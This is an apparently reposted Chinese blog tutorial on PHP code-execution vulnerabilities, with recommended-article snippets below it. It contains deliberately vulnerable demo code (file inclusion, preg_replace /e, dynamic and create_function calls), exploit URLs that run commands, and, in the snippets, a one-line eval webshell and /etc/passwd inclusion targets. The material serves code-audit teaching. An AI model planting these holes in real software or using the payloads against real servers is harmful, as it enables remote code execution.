php array =%3e变,PHP代码执行漏洞总结

最新推荐文章于 2021-10-11 21:40:02 发布
最新推荐文章于 2021-10-11 21:40:02 发布
阅读量110 收藏
点赞数
文章标签: php array =%3e变

这篇文章介绍的内容是关于PHP代码执行漏洞总结,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下

PHP代码执行漏洞总结

ref : http://blog.csdn.net/kuangmang/article/details/27170309

ref : http://blog.csdn.net/fuckcat_2333/article/details/52125951

1 代码执行函数

php中可以执行代码的函数有: eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 pcntl_exec()

这些函数中的参数(部分)可控时,则可能命令注入漏洞。通常会使用escapeshellarg对参数进行处理,但在低版本的PHP库函数中该函数存在漏洞(原因:Windows上未对反斜杠进行过滤),需要注意。

2 文件包含代码注入

当文件包含函数(include、include_once、require、require_once)中包含输入变量时,可能导致代码注射。

条件:allow_url_include=On,PHP Version>=5.2.0

demo code:<?phpinclude ($_GET['a']);?>

访问http://127.0.0.1/demo.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E时,即执行phpinfo()。

3 正则表达代码注入

preg_replace()函数:

当pattern中存在/e模式修饰符,匹配上时,即允许执行replacement中的代码。

3.1 第一个(pattern)参数注入

条件:magic_quotes_gpc=Off,pattern参数中注入/e选项;

demo code:<?phpecho $regexp = $_GET['reg'];

$var = 'phpinfo()';

preg_replace("/(.*?)$regexp", '\\1', $var);?>

访问http://127.0.0.1/preg_replace1.php?reg=%3C/php%3E/e

即会执行phpinfo()

3.2 第二个人(replacement)参数注入

条件:pattern参数中带/e<?phppreg_replace ("/testxxx/e",$_GET['h'],"jutst test testxxx!");?>

提交 http://127.0.0.1/demo2.php?h=phpinfo()时, 即 执行phpinfo()。

3.3 第三个参数注射

4 动态代码执行

4.1 动态变量代码执行<?php $dyn_func = $_GET['dyn_func'];

$argument = $_GET['argument'];

$dyn_func($argument);?>

当http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig时,执行ipconfig命令

4.2 动态函数代码执行

关键函数:create_function

demo code:<?php $foobar = $_GET['foobar'];$dyn_func = create_function('$foobar', "echo $foobar;");$dyn_func('');?>

当提交http://127.0.0.1/create_function.php?foobar=system%28dir%29时,执行dir命令

5 其他

array_map()函数

ob_start()函数???

函数处理函数:http://www.php.com/manual/zh/book.funchand.php

相关推荐:

PHP执行程序php.exe参数解析

weixin_39982236
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中使用in_array易产生代码安全漏洞
温柔手的专栏
06-07 3220
执行上面的代码看看,你想说什么?我是惊出了冷汗的in_array常被老手们这样用做量检查,但显然结果并不靠谱。为什么会这样呢?再试试这个问题似乎是PHP的默认类型转换造成的,数字与字符串比较时,字符串先被强制转成数字再进行了比较。真的是这个原因吗?爱较真的朋友请自行查看PHP源码,没准你还会发现其他问题。其实in_array
php代码命令执行漏洞-常见危险函数
qq_41272376的博客
02-16 4703
php代码/命令执行漏洞-常见危险函数 php代码执行相关 eval() mixed eval ( string $code ) 把字符串code作为php代码执行。常见的一句话木马: <?php eval($_GET['pass']) ?> 访问: http://xxx/codeexec.php?pass=phpinfo(); 得到phpinfo()页面。 assert() PHP 5 bool assert ( mixed $assertion [, string $desc
PHP漏洞全解
04-15 948
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
php代码审计_PHP代码审计常见漏洞
weixin_39875192的博客
11-21 684
点击蓝字,关注我们本文作者:Peiqi (团队成员)本文字数:6300阅读时长:30min附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载关于CMS和CTF中的PHP代码审计部分常见的函数缺陷in_array函数缺陷class Challenge { const UPLOAD_DIRECTORY = './solutio...
文件包含include的奇淫技巧长期更新ing
giaogiao123的博客
09-01 392
前言demo 其实include这个函数人人都知道,php漏洞大多数来源于几个危险函数,这次先讲解include后面会讲解更多用法. <?php $a = $_GET['a']; include($a); ?> 1 include文件包含漏洞 windos c:\windows\System32\drivers\etc\hosts linux /etc/passwd 2图片???? 图片????简单来说就是上传一个木马但是后缀是jpg或者png,但是include函数执行时无视后
php 正确解码javascript中通过escape编码后的字符
12-17
这是很久以前收集的一个,不知道谁写的了,但经过测试没有问题~ JavaScript代码 复制代码 代码如下: function phpUnescape($escstr) { preg_match_all(“/%u[0-9A-Za-z]{4}|%.{2}|[0-9a-zA-Z.+-_]+/”, $escstr, $...
PHP房地产建筑工程施工公司网站源码 带手机版
08-13
PHP房地产建筑工程施工公司网站源码 带手机版 数据库修改MD5: e2c658ff480bc179c4d741ef860a9009 密码:123456 14e1b600b1fd579f47433b88e8d85291 密码:123456 e10adc3949ba59abbe56e057f20f883e 密码:123456 ...
lohvaa_phpQuery_izj3e1.rar
09-23
脚本语言服务端php实现,这是一个用php脚本语言写的小偷采集,猴岛论坛小偷 v3.0,猴岛论坛小偷 功能简介:1.采用php小偷技术自动与猴岛论坛同步更新!2.动态浏览与静态后台自由切换!3.全站伪原创.全站可生成页面缓存...
基于spartan-3E的交通灯控制系统verilog代码
01-09
基于spartan-3E的交通灯控制系统verilog代码
LCD12864 在Spartan-3E实现教程和代码
11-21
LCD12864 在Spartan-3E实现教程和代码
代码审计之代码执行漏洞
willow_liang的博客
11-10 416
目录 代码执行漏洞 1.代码执行函数 ​2.文件 2.包含代码注入 3.正则表达式代码注入 4.动态代码执行 5.其他 PHP函数处理: https://www.php.net/manual/zh/book.funchand.php 代码执行漏洞利用 代码执行漏洞的防御 代码执行漏洞 应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞PHP:eval assert Python: ex...
关于重定向与转发
weixin_30257433的博客
08-13 63
其实这个问题一直比较模糊。今天有人讨论这个东西,比较浅显的比较了一番。 我是从http这个角度来看的。   我用来测试的PHP代码 <?php $key = empty($_GET['key'])?0:$_GET['key']; echo $key; if($key == 'redirect'){ header("location:d...
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_35797900的博客
03-18 580
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
PHP代码执行漏洞总结大全
热门推荐
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改功能快捷键合理的创建标题,有助于目录的生成如何改文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
文件包含漏洞
Le0nis的博客
07-27 8370
文件包含漏洞0x01 产生原因在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入分类 本地文件包含 当被包含的文件在服务器本地时,就形成本地文件包含 远程文件包含 当被包含的文件在第三方服务器时,叫做远程文件包含 需要: php.ini allow_url_fopen on
%3cphp和%3c php_php代码审计学习之函数缺陷
weixin_35682426的博客
12-30 2831
php代码审计学习之函数缺陷in_array函数缺陷Wish ListCodeclass Challenge {const UPLOAD_DIRECTORY = './solutions/';private $file;private $whitelist;public function __construct($file) {$this->file = $file;$this->wh...
python自学教程-04-自定义JavaScript.ev4.rar
最新发布
05-21
python自学教程-04-自定义JavaScript.ev4.rar
严蔚敏数据结构全套C语言实现
05-21
严蔚敏数据结构全套C语言实现
Java_Android的可扩展媒体播放器.zip
05-21
Java_Android的可扩展媒体播放器
x=%3Cscript%3E
05-30
这个请求中,x的值是"%3Cscript%3E",它是对字符串"<script>"进行URL编码后的结果。在URL中,某些字符需要进行编码,才能在网络上正确传输和展示。"和">"等字符在URL中有特殊含义,如果直接使用这些字符,可能会导致...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值